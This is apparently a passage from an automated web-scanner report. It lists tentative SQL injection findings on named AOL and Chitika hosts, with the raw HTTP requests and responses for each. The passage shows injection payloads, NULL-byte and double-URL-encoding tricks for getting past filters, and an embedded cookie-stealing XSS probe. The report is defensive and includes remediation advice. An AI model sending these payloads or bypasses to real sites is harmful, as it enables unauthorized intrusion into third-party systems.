href=\""+gurl("ChBNTdKAAARBlgrlZ6egRAtDEghTZWN1cml0eRoIduiH12Hhbe8oAVITCIKw58mL8qYCFV1n5QodGm4-Ag")+"&okw=Security\" onMouseOver=\"return ss("+sl.length+")\" onMouseOut=\"cs()\" class=alt target=_top>");sl[sl.length]='View ads about Security';</script>Security</a><div class=sep><img height=1 width=1 alt=""/></div><script>document.write("&nbsp;&nbsp;<a href=\""+gurl("ChBNTdKAAARBugrlZ6egRAtDEgVMaW51eBoI6d0Htx_VVAsoAVITCIKw58mL8qYCFV1n5QodGm4-Ag")+"&okw=Linux\" onMouseOver=\"return ss("+sl.length+")\" onMouseOut=\"cs()\" class=alt target=_top>");sl[sl.length]='View ads about Linux';</script>Linux</a><div class=sep><img height=1 width=1 alt=""/></div><script>document.write("&nbsp;&nbsp;<a href=\""+gurl("ChBNTdKAAARBvgrlZ6egRAtDEg1WdWxuZXJhYmlsaXR5GgjjreViiTH32SgBUhMIgrDnyYvypgIVXWflCh0abj4C")+"&okw=Vulnerability\" onMouseOver=\"return ss("+sl.length+")\" onMouseOut=\"cs()\" class=alt target=_top>");sl[sl.length]='View ads 
about Vulnerability';</script>Vulnerability</a><div class=sep><img height=1 width=1 alt=""/></div><script>document.write("&nbsp;&nbsp;<a href=\""+gurl("ChBNTdKAAARBwQrlZ6egRAtDEgxMQU4gU29mdHdhcmUaCJ1Raqvn
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-8946084125644802&output=html&h=90&slotname=1903810917&w=120&lmt=1296965214&flash=10.1.103&url=http%3A%2F%2Fwww.linuxsecurity.com%2Fadvisories%2F%3F1'%3D1'%20and%201%3d2--%20&dt=1296945314953&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=6016247947&correlator=1296945312778&frm=0&adk=343220409&ga_vid=34780583.1296945313&ga_sid=1296945313&ga_hid=717362596&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=985&bih=1012&ref=http%3A%2F%2Fburp%2Fshow%2F23&fu=0&ifi=2&dtd=17&xpc=Kc5XABeAHH&p=http%3A//www.linuxsecurity.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.linuxsecurity.com/advisories/?1'=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 05 Feb 2011 22:43:13 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 5032

<html><head><style>#abg{font-family:arial,sans-serif;font-size:12px;color:#000000;padding:0px 1px;white-space:nowrap;font-weight:bold;}.sep{height:2px;width:100%;}.bb{overflow:hidden;width:120px;}.al{
...[SNIP]...
length;++i)qs+='kw'+i+'='+adt[i]+'&';qs=qs.slice(0,-1);return rl_dest_url+qs;}function ss(wi){window.status=sl[wi];return true;}function cs(){window.status='';}i=0;adt=[];adt[i++]="Security";adt[i++]="Software";adt[i++]="Linux";adt[i++]="Vulnerability";var sl=[];</script></head><body bgcolor=#e6e6e6 text=#000000><table bgcolor=#e6e6e6 border=0 cellpadding=0 cellspacing=0 height=100% width=100% ><tr><td height=18 bgcolor=#e6e6e6 valign=middle><div class=bb><script>adu='';document.write('<a href="https://www.google.com/adsense/support/bin/request.py?contact=abg_afc&url=http://www.linuxsecurity.com/advisories/%3F1%27%3D1%27%2520and%25201%3D2--&hl=en&client=ca-pub-8946084125644802');if(adt.length==0)document.write('&adU=+'+'&adT=no+AdLinks+found');for(i=0;i<adt.length;++i)document.write('&adU='+(adu+='+')+'&adT='+adt[i]);document.write('" target=_blank id=abg>Ads by Google</a>');</script></div></td></tr><tr><td valign=top><div class=al style="padding:0px 0px"><div class=sep><img height=1 width=1 alt=""/></div><script>document.write("&nbsp;&nbsp;<a href=\""+gurl("ChBNTdKBAAj5xQrlcYyjh3oiEghTZWN1cml0eRoILxoQuM7pVhEoAVITCPKbt8qL8qYCFaFo5QodYB-HBQ")+"&okw=Security\" onMouseOver=\"return ss("+sl.length+")\" onMouseOut=\"cs()\" class=alt target=_top>");sl[sl.length]='View ads about Security';</script>Security</a><div class=sep><img height=1 width=1 alt=""/></div><script>document.write("&nbsp;&nbsp;<a href=\""+gurl("ChBNTdKBAAj52grlcYyjh3oiEghTb2Z0d2FyZRoIm_sh5ojTnt4oAVITCPKbt8qL8qYCFaFo5QodYB-HBQ")+"&okw=Software\" onMouseOver=\"return ss("+sl.length+")\" onMouseOut=\"cs()\" class=alt target=_top>");sl[sl.length]='View ads about Software';</script>Software</a><div class=sep><img height=1 width=1 alt=""/></div><script>document.write("&nbsp;&nbsp;<a href=\""+gurl("ChBNTdKBAAj53QrlcYyjh3oiEgVMaW51eBoIpJh5TtXxJbsoAVITCPKbt8qL8qYCFaFo5QodYB-HBQ")+"&okw=Linux\" onMouseOver=\"return ss("+sl.length+")\" onMouseOut=\"cs()\" class=alt target=_top>");sl[sl.length]='View ads about 
Linux';</script>Linux</a><div class=sep><img height=1 width=1 alt=""/></div><script>document.write("&nbsp;&nbsp;<a href=\""+gurl("ChBNTdKBAAj55wrlcYyjh3oiEg1WdWxuZXJhYmlsaXR5Gghi_ZPH7iTPeygBUhMI8pu3yovypgIVo
...[SNIP]...

1.3. http://latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://latino.aol.com
Path:   /$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 10145548'%20or%201%3d1--%20 and 10145548'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video?110145548'%20or%201%3d1--%20=1 HTTP/1.1
Host: latino.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 17:30:07 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: portal-tc-lmb11.websys.aol.com
x-ua-compatible: IE=EmulateIE7
Content-Type: text/html;;charset=utf-8
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Length: 15575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" class="IE7"
...[SNIP]...
<label for="srchtog1" class="srchtogt">Español</label>
<input type="radio" name="lr" id="srchtog2" value="lang_en" onclick="omcl(this,'srchtoggle2')" checked /><label for="srchtog2" class="srchtogt">Web</label>
<input id="srchrp" type="hidden" name="rp" value=""/>
</div>
</form>
</div>
</div>
</div>
<script type="text/javascript">
var se=1;
p_o('topQuery2').focus();

</script>
</div>
<div id="nav"><div id="navW" class="M">
<div class="dir">
<div id="dirhd">
<ul id="dhL2">
<li class="dhL1"><a accesskey="M" href="http://webmail.aol.com" name="om_dirbtn1">Mail</a></li>
</ul><a id="amre" title="Discover AOL provides information about AOL's many products and services, including free software, Safety and Security tools, and free services. " name="om_dir_a-z" onclick="icid(this,'icid=navbar_More');" href="http://about.aol.com/sitemap/">Can't Find It? AOL A to Z</a></div>
<div id="dircnt">
<ul id="om_dir_col1_" class="serv c noic"></ul>
<ul id="om_dir_col1_" class="serv c0 noic">
<li><a id="d1" title="IM friends right from your browser -no download required" class="nIcn" onclick="ae7.launch(); return false; icid(this,'icid=navbar_AIM');" href="http://www.aim.com/products/express/">AIM</a></li>

<li><a id="d2" title="Research, find and buy new and used cars" class="nIcn" onclick="icid(this,'icid=navbar_Autos');" href="http://autos.aol.com/">Autos</a></li>

<li><a id="d3" title="African-American news, culture and community" class="nIcn" onclick="icid(this,'icid=navbar_BV');" href="http://blackvoices.aol.com/">Black Voices</a></li>

<li><a id="d17" title="Celebrity news and photos as well as top music, movie and TV news from Popeater" class="nIcn" onclick="icid(this,'icid=navbar_pope
...[SNIP]...

Request 2

GET /$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video?110145548'%20or%201%3d2--%20=1 HTTP/1.1
Host: latino.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 17:30:07 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: portal-tc-lmb28.websys.aol.com
x-ua-compatible: IE=EmulateIE7
Content-Type: text/html;;charset=utf-8
Keep-Alive: timeout=5, max=80
Connection: Keep-Alive
Content-Length: 15603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" class="IE7"
...[SNIP]...
<label for="srchtog1" class="srchtogt">Español</label>
<input type="radio" name="lr" id="srchtog2" value="lang_en" onclick="omcl(this,'srchtoggle2')" checked /><label for="srchtog2" class="srchtogt">Web</label>
<input id="srchrp" type="hidden" name="rp" value=""/>
</div>
</form>
</div>
</div>
</div>
<script type="text/javascript">
var se=1;
p_o('topQuery2').focus();

</script>
</div>
<div id="nav"><div id="navW" class="M">
<div class="dir">
<div id="dirhd">
<ul id="dhL2">
<li class="dhL1"><a accesskey="M" href="http://webmail.aol.com" name="om_dirbtn1">Mail</a></li>
</ul><a id="amre" title="Discover AOL provides information about AOL's many products and services, including free software, Safety and Security tools, and free services. " name="om_dir_a-z" onclick="icid(this,'icid=navbar_More');" href="http://about.aol.com/sitemap/">Can't Find It? AOL A to Z</a></div>
<div id="dircnt">
<ul id="om_dir_col1_" class="serv c noic"></ul>
<ul id="om_dir_col1_" class="serv c0 noic">
<li><a id="d1" title="IM friends right from your browser -no download required" class="nIcn" onclick="ae7.launch(); return false; icid(this,'icid=navbar_AIM');" href="http://www.aim.com/products/express/">AIM</a></li>

<li><a id="d2" title="Research, find and buy new and used cars" class="nIcn" onclick="icid(this,'icid=navbar_Autos');" href="http://autos.aol.com/">Autos</a></li>

<li><a id="d3" title="African-American news, culture and community" class="nIcn" onclick="icid(this,'icid=navbar_BV');" href="http://blackvoices.aol.com/">Black Voices</a></li>

<li><a id="d17" title="Celebrity news and photos as well as top music, movie and TV news from Popeater" class="nIcn" onclick="icid(this,'icid=navbar_pope
...[SNIP]...

1.4. http://mm.chitika.net/minimall [cb parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://mm.chitika.net
Path:   /minimall

Issue detail

The cb parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cb parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&ref=http%3A//burp/show/1&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=428%00'&loc=205,1872&output=simplejs&callback=ch_ad_render_search HTTP/1.1
Host: mm.chitika.net
Proxy-Connection: keep-alive
Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:28 GMT
Server: Apache
P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: _cc=G/SkJTIBohB5z2pknKpk7dMBnVZJ1DBBLfD22Pt+xU2PMB6YwzEpG+32MdrC/bifzPdADvQXT5iL0Ejk4SoBE/RbcgLQI0z29hms4++5c518R/zUMKkBDANZDDcfeSSJsmKZKYF4g+e5/vR3s5vQQ7KmJYRZ2Ke5I7+Px/Q1DWIeAxjVePvZA3qEWPWNA4pW0y2sicSGc+OlVoHYO+iW+etQJWO903qBRjyUMB0CsnUiLCSK7ynCeU5y8vPgJO/l5QmFEhQcxYvOtJH0zTOq/DdkOdd/SL0ajHQz1t4DCzkykwGq4Aw7x+tPgkAhoQGPt9IleOihg6gLkHmyjN8bS0MOCuU93O5YHhVCLopbJlVmacuwMv8bCtG3aUjz7yVRP2bGb25zrFQSIASGHiNo65FqRryWti1di9zr7c4KSwyrOw==.dJDZXe3hTuyZrPKKuugNLQ.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:02:28 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 19714

var ch_mmhtml = {"mobilehtml":"","pixelhtml":"","snurl":"http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=pc-test.com,gofreemanuals.com,ebay.c
...[SNIP]...
KCpxo9ichxH8ldyrWDOlTDIX0nEp9dmoIMEEUHcDE0aWSuqd0ezjPzLg2vwq7QhRJ6IBfF5G6sqRQsBqlrfmecBnceMPA%2FNVxpMVm55EolFY76tnNe82&template=v1-450xauto\">Your Free recommended download to fix Windows Vista and XP errors!<!--overture-->
...[SNIP]...

Request 2

GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&ref=http%3A//burp/show/1&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=428%00''&loc=205,1872&output=simplejs&callback=ch_ad_render_search HTTP/1.1
Host: mm.chitika.net
Proxy-Connection: keep-alive
Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:28 GMT
Server: Apache
P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: _cc=G/SkJTIFoxB5zyrGvNooXWckqgQj0XDDSYJM4fZ/UN5/pNoUWjY2UStRAsZ8z+UER5ssfI1MfMTt/HEA+fUJ+mJOUAA27n1jL4aNT6t45eInqrtq/te5yFu/4TgWJgPF3lanaA/WQL0hGR4YNn40OphE1cqtxFAiYkM1oYqHQjxQc7aTwAKpHz+B9MDKPLyrxntwh3/i2mJX5Nc/Q90Zv2UrsgXZTlZb8We5HR60n1BuMzOoS0f2BaCmBktIv0KuD7JiPQ8vvPW3a/RSzF+w+ieyhBpSZyayzNgFIk3CxJ1Er4t1IIZN5fMORUpiILRivZqer79VNpU3Z7/GIz5YXjdAKpV/kZh2ArN9FGGu9PQbNss3p1F+wvGCxJwowXASlEVIlb3eIZsCuDbU6YuQ8/JIpoTrl77tvTTezvSiw3n4w6Ya.XCrCvBdO0LVqEPsFqbfYvA.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:02:28 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 20057

var ch_mmhtml = {"mobilehtml":"","pixelhtml":"","snurl":"http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=open-with.pc-test.com,gofreemanuals.
...[SNIP]...

1.5. http://mm.chitika.net/minimall [cl_site_link parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://mm.chitika.net
Path:   /minimall

Issue detail

The cl_site_link parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cl_site_link parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the cl_site_link request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&ref=http%3A//burp/show/2&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3%2527&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=159&loc=205,1844&output=simplejs&callback=ch_ad_render_search HTTP/1.1
Host: mm.chitika.net
Proxy-Connection: keep-alive
Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%2527%253balert%25281%2529%252f%252f35f276845e/product_problem
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cc=G/SkJTIFoxB5zyrGvNoopWH98lzIGX09Lqf5eXifPARQKIeBMDE2hXiO2v2mk4qq+VP5P+m5J4eRJC5zWa+7Jf/jc6jkVmF/MbVWYaETxPD821XiL9JnE93XkPahPfrLgcfAbrpHrHNZJnEeObU3OtCTVkfYYH7KACiAKZU6LmYWAtjWSyuwX+GHPstuHx9zwtQHlMeOjOOZqdwl722uq28wErLf/s1odnEP3DQeHuP1taSO/8VINxZmUH3OCHKjzoEA3Ep2hvSi4fTUQ9xQg5HBigwFw6FcG4XjG/ZwAf++TM2bd6D6MDuMeCmjszjwKZD/DVxhbPa1zjGTdrpztnAx7H5aYU7Rqim51ZoqsIAq7yljuMQoFzxW0QdFZuKMR6dZIfdTULQZElAm9UvyESXU0bZ2j55Oz02Ty6P8x00eoqYu.JlGLkqSjkssYk0faKwa/ow.4

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:03:04 GMT
Server: Apache
P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: _cc=...[SNIP]...; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:03:04 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 19038

var ch_mmhtml = {"mobilehtml":"","pixelhtml":"","snurl":"http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=home-warranty.firstam.com,homewarran
...[SNIP]...
gYZKPBN4JCKZoLQG8l5d70OEnJGhuQplXG%2FzRyTwAzRaGBLVM9lQz5Zr%2B4E92M6fWD2ZHc5UnKJZ8o%2BDEbw1CFsq%2B6QBonqYdQ0FLncw%3D%3D&template=v1-450xauto\">Your Free recommended download to fix Windows Vista and XP errors!<!--overture-->
...[SNIP]...

Request 2

GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&ref=http%3A//burp/show/2&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3%2527%2527&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=159&loc=205,1844&output=simplejs&callback=ch_ad_render_search HTTP/1.1
Host: mm.chitika.net
Proxy-Connection: keep-alive
Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%2527%253balert%25281%2529%252f%252f35f276845e/product_problem
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cc=G/SkJTIFoxB5zyrGvNoopWH98lzIGX09Lqf5eXifPARQKIeBMDE2hXiO2v2mk4qq+VP5P+m5J4eRJC5zWa+7Jf/jc6jkVmF/MbVWYaETxPD821XiL9JnE93XkPahPfrLgcfAbrpHrHNZJnEeObU3OtCTVkfYYH7KACiAKZU6LmYWAtjWSyuwX+GHPstuHx9zwtQHlMeOjOOZqdwl722uq28wErLf/s1odnEP3DQeHuP1taSO/8VINxZmUH3OCHKjzoEA3Ep2hvSi4fTUQ9xQg5HBigwFw6FcG4XjG/ZwAf++TM2bd6D6MDuMeCmjszjwKZD/DVxhbPa1zjGTdrpztnAx7H5aYU7Rqim51ZoqsIAq7yljuMQoFzxW0QdFZuKMR6dZIfdTULQZElAm9UvyESXU0bZ2j55Oz02Ty6P8x00eoqYu.JlGLkqSjkssYk0faKwa/ow.4

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:03:04 GMT
Server: Apache
P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: _cc=...[SNIP]...; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:03:04 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 18984

var ch_mmhtml = {"mobilehtml":"","pixelhtml":"","snurl":"http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=open-with.pc-test.com,sparxsystems.c
...[SNIP]...

1.6. http://mm.chitika.net/minimall [frm parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://mm.chitika.net
Path:   /minimall

Issue detail

The frm parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the frm parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&ref=http%3A//burp/show/1&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false%00'&history=2&cb=428&loc=205,1872&output=simplejs&callback=ch_ad_render_search HTTP/1.1
Host: mm.chitika.net
Proxy-Connection: keep-alive
Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:01:49 GMT
Server: Apache
P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: _cc=G/SkJTIFoxB5zyrGvNooXe99hdD4N3Y8+hAWrbEPZjNgAYyxYDc25rnr3Ff/Paa9/v3eI79FPXJcaLozQcxdpm5MM6R4QaC6sE5VMlIyysjvzjIeQkglG+XihWzhr/fZli1zObbtcS6mSLQnjk03OgIAQN4xIi4OAGyaxsr2pmtcoIEdVFMLG1qU2DWdhwqZmSygSSW8QGDuC4HGJ0b/Z2L9NCigN44ppkm4HdKHuVwsMzOoS0f2BaGqdksKsUKux/kFVZeyXFieCY/ZQRCiGwnaR6ImPRDQS/lIoW6dtX5Qz5Rb81Og0A9uKOao57Q3ndpPaWNj96D/Lo5ssIaeclFQKZRjkZp2ArR9KuWy9vUbLvuxpGH6lkiTumvPM+RUBP96mw5RFlxP8EylO52TSis8TgwolY5Gg3BfKaaG0W/FJaYc.s/MiCuIckIOrG8DkvWNfiA.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:01:49 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 19194

var ch_mmhtml = {"mobilehtml":"","pixelhtml":"","snurl":"http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=home-warranty.firstam.com,pc-test.co
...[SNIP]...
O15H5daRJPBlH%2FSbzIHiQCsWSZWkQSTw3AHBTGHo9g6qLtBS5%2BaQXf3HvBBTCB%2ByzTytycqPwU82LaNRsvca1NL910pVw7nc3TO1IgGGuIAO2uYw&template=v1-450xauto\">Your Free recommended download to fix Windows Vista and XP errors!<!--overture-->
...[SNIP]...

Request 2

GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&ref=http%3A//burp/show/1&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false%00''&history=2&cb=428&loc=205,1872&output=simplejs&callback=ch_ad_render_search HTTP/1.1
Host: mm.chitika.net
Proxy-Connection: keep-alive
Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
